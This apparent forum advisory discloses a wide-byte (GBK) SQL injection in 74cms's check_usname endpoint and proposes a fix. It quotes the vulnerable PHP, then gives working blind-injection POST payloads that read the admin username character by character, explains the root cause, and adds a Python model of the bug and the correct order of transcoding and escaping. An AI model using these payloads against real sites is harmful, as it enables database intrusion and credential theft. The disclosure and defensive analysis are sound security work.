74cms site-wide wide-byte injection vulnerability, tested on 74cms_v3.4.20140115 [ CodeSec-2014-0004 ]
Posted 2014-2-23 15:38:37

Developer vulnerability advisory: 74cms site-wide wide-byte injection vulnerability [ CodeSec-2014-0003 ]

Vulnerability ID: CodeSec-2014-0003

Title: 74cms site-wide wide-byte injection vulnerability

Type: wide-byte (multibyte) SQL injection

Severity: High

Status: published, contacting the developer...

Details:
see the post body

Fix:
use a safer transcoding approach (escape after transcoding, in the charset the database connection uses, or bind the value as a prepared-statement parameter)

Source:
http://www.74cms.com/

Forum mirror of the source:
http://pan.baidu.com/s/1qWEtkra

Developer reply: none yet

Example of the vulnerable code
/plus/ajax_user.php
elseif($act =='check_usname')
{
        require_once(QISHI_ROOT_PATH.'include/fun_user.php');
        // at this point the request value has already been backslash-escaped as UTF-8 text
        $usname=trim($_POST['usname']);
        // site-wide transcoding: on a non-UTF-8 build (e.g. GBK) the already-escaped text
        // is converted to the database charset; the conversion can produce a 0x5C byte
        if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0)
        {
        $usname=iconv("utf-8",QISHI_DBCHARSET,$usname);
        }
        // boolean oracle: prints "true" if no row matched the name, "false" if one did
        $user=get_user_inusername($usname);
        empty($user)?exit("true"):exit("false");
}


Now look at the get_user_inusername function in include/fun_user.php
function get_user_inusername($username)
{
        global $db;
        // $username is interpolated straight into the statement; no escaping happens here
        $sql = "select * from ".table('members')." where username = '{$username}' LIMIT 1";
        return $db->getone($sql);
}


Test method
URL
http://www.74cms.me/plus/ajax_user.php?act=check_usname


POST body (%23 is the # that comments out the rest of the original query)
usname=s%E9%8C%A6' or cast(ascii(substring((select admin_name from qs_admin),2,1))>100 as signed)  %23


%E9%8C%A6 is the rawurlencode value of the character 錦 (its UTF-8 bytes, percent-encoded); note that this is not the urlencode value. The two PHP functions differ only in how they treat spaces and a few ASCII characters, so the bytes of 錦 itself come out the same either way.

The SQL that get_user_inusername executes is
select * from qs_members where username = '錦\' or cast(ascii(substring((select admin_name from qs_admin),2,1))>100 as signed) #' LIMIT 1


Result: true

POST body
usname=%E9%8C%A6' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed)  %23

Here 100 is changed to 99

The SQL that get_user_inusername executes is

select * from qs_members where username = '錦\' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed) #' LIMIT 1


Result: false


Another pair of wide-byte characters gives the same effect
POST body
usname=%E7%A9%BA%E9%81%8B' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed)  %23

%E7%A9%BA%E9%81%8B is 空運


Statement breakdown
select admin_name from qs_admin
If the table holds only the admin user this returns admin (the subquery must return exactly one row, otherwise MySQL raises an error).
select ascii(substring((select admin_name from qs_admin),2,1))   equals 100, the ASCII code of "d", the second character of admin. Look up the MySQL functions substring, ascii and cast if they are unfamiliar.

So the injected condition reduces to
select cast(100>99 as signed)   equals 1
select cast(100>100 as signed)  equals 0
A true condition matches every row, get_user_inusername returns one and the endpoint prints false; a false condition matches nothing and it prints true. Comparing the two responses pins the character down, and the same probe works for any position and any threshold.
Root cause: the site-wide transcoding code
        if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0)
        {
        $usname=iconv("utf-8",QISHI_DBCHARSET,$usname);
        }
runs after the request has already been backslash-escaped. In GBK the character 錦 is encoded as the two bytes E5 5C, and 5C is the backslash. Escaping 錦' gives 錦\'; transcoding that to GBK yields the bytes E5 5C 5C 27. Unless the connection's client character set is GBK, the server's lexer reads that literal byte by byte: 5C 5C is an escaped backslash and the 27 that follows ends the string, so the rest of the payload runs as SQL. Any GBK character whose second byte is 5C serves the same purpose, which is why the second test uses 運. Escaping has to happen after transcoding, in the charset the database connection actually uses, or better, the value should be bound as a prepared-statement parameter.
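The following Python is an added example, not code from the 74cms project or from this post. It models the bytes of the escape-then-iconv pipeline above and of the fixed order (transcode first, then escape), and checks each against a reduced model of how MySQL's lexer scans a single-quoted literal. Assumptions, and not part of the original: addslashes() mirrors PHP's addslashes(); closing_quote() is a simplified lexer with two readings, one for a GBK client character set and one for binary/latin1/utf8; the query text only mirrors the statement quoted in the post; every payload is constructed here.

```python
# Added example, not code from the 74cms project or from the post above.
# Byte-level model of the escape-then-iconv bug in plus/ajax_user.php.
# Assumptions (labelled): addslashes() mirrors PHP's addslashes(); closing_quote()
# is a reduced model of how MySQL's lexer scans a single-quoted literal; the query
# text only mirrors the one quoted in the post; all payloads are constructed here.

PREFIX = b"select * from qs_members where username = '"
SUFFIX = b"' LIMIT 1"


def addslashes(text: str) -> str:
    """PHP addslashes() on the UTF-8 request text: a backslash before the quote
    characters, the backslash itself and NUL."""
    out = []
    for ch in text:
        if ch == "\0":
            out.append("\\0")
        else:
            if ch in "'\"\\":
                out.append("\\")
            out.append(ch)
    return "".join(out)


def is_gbk_pair(data: bytes, i: int) -> bool:
    """True if data[i:i+2] is a GBK lead byte 0x81-0xFE plus a valid trail byte."""
    return (i + 1 < len(data) and 0x81 <= data[i] <= 0xFE
            and (0x40 <= data[i + 1] <= 0x7E or 0x80 <= data[i + 1] <= 0xFE))


def vulnerable_pipeline(user_input: str) -> bytes:
    """74cms order: escape the request as UTF-8 text, then iconv it to GBK."""
    return addslashes(user_input).encode("gbk")


def escape_bytes(value: bytes, client_gbk: bool) -> bytes:
    """Escape the bytes that reach the server, in the charset the server lexes with.
    client_gbk=True copies a valid lead/trail pair untouched (what a charset-aware
    escaper such as mysqli_real_escape_string does after mysqli_set_charset('gbk'));
    client_gbk=False escapes every byte on its own (right for character_set_client=binary)."""
    out = bytearray()
    i = 0
    while i < len(value):
        if client_gbk and is_gbk_pair(value, i):
            out += value[i:i + 2]
            i += 2
            continue
        b = value[i]
        if b == 0x00:
            out += b"\\0"
        else:
            if b in (0x27, 0x22, 0x5C):
                out.append(0x5C)
            out.append(b)
        i += 1
    return bytes(out)


def hardened_pipeline(user_input: str, client_gbk: bool) -> bytes:
    """Fix: transcode first, then escape in the charset the connection really uses."""
    return escape_bytes(user_input.encode("gbk"), client_gbk)


def closing_quote(query: bytes, open_idx: int, client_gbk: bool):
    """Index of the quote closing the literal opened at query[open_idx], or None.
    Reduced model of MySQL's lexer: with a GBK client charset a lead/trail pair is one
    character, so a trailing 0x5C never escapes anything; with a binary, latin1 or utf8
    client charset the bytes are read one at a time and every 0x5C escapes the next byte."""
    i = open_idx + 1
    while i < len(query):
        if client_gbk and is_gbk_pair(query, i):
            i += 2
        elif query[i] == 0x5C:
            i += 2
        elif query[i] == 0x27:
            if i + 1 < len(query) and query[i + 1] == 0x27:  # '' is an escaped quote
                i += 2
            else:
                return i
        else:
            i += 1
    return None


def literal_intact(value: bytes, client_gbk: bool) -> bool:
    """True when the whole value stays inside the username literal of the 74cms query."""
    query = PREFIX + value + SUFFIX
    return closing_quote(query, len(PREFIX) - 1, client_gbk) == len(PREFIX) + len(value)


def gbk_chars_ending_in_backslash(start: int = 0x4E00, stop: int = 0x9FA6) -> list:
    """All CJK characters whose GBK encoding ends in 0x5C; 錦 from the post is one of them."""
    found = []
    for cp in range(start, stop):
        try:
            enc = chr(cp).encode("gbk")
        except UnicodeEncodeError:
            continue
        if len(enc) == 2 and enc[1] == 0x5C:
            found.append(chr(cp))
    return found


if __name__ == "__main__":
    payload = "錦' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed) #"
    v = vulnerable_pipeline(payload)
    print("escape-then-iconv, first bytes:", v[:4].hex(" "))
    for gbk in (False, True):
        h = hardened_pipeline(payload, gbk)
        print(f"client_gbk={gbk}: vulnerable intact={literal_intact(v, gbk)}, "
              f"hardened intact={literal_intact(h, gbk)}")
    print("GBK characters with a 0x5C trail byte:", len(gbk_chars_ending_in_backslash()))
```

Running it shows the escaped-then-transcoded payload starting with e5 5c 5c 27, which breaks out of the literal under the byte-by-byte reading, while transcoding first and escaping in the connection's charset keeps the value inside the literal under the matching reading. gbk_chars_ending_in_backslash() lists every character that could replace 錦, which is why filtering one character is not a fix. The durable fix is a prepared statement (mysqli or PDO), so the value never passes through the SQL lexer at all; if escaping is kept, it must run after iconv, with mysqli_real_escape_string on a connection whose charset was set via mysqli_set_charset, so that the escaper and the server agree on where each character ends.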




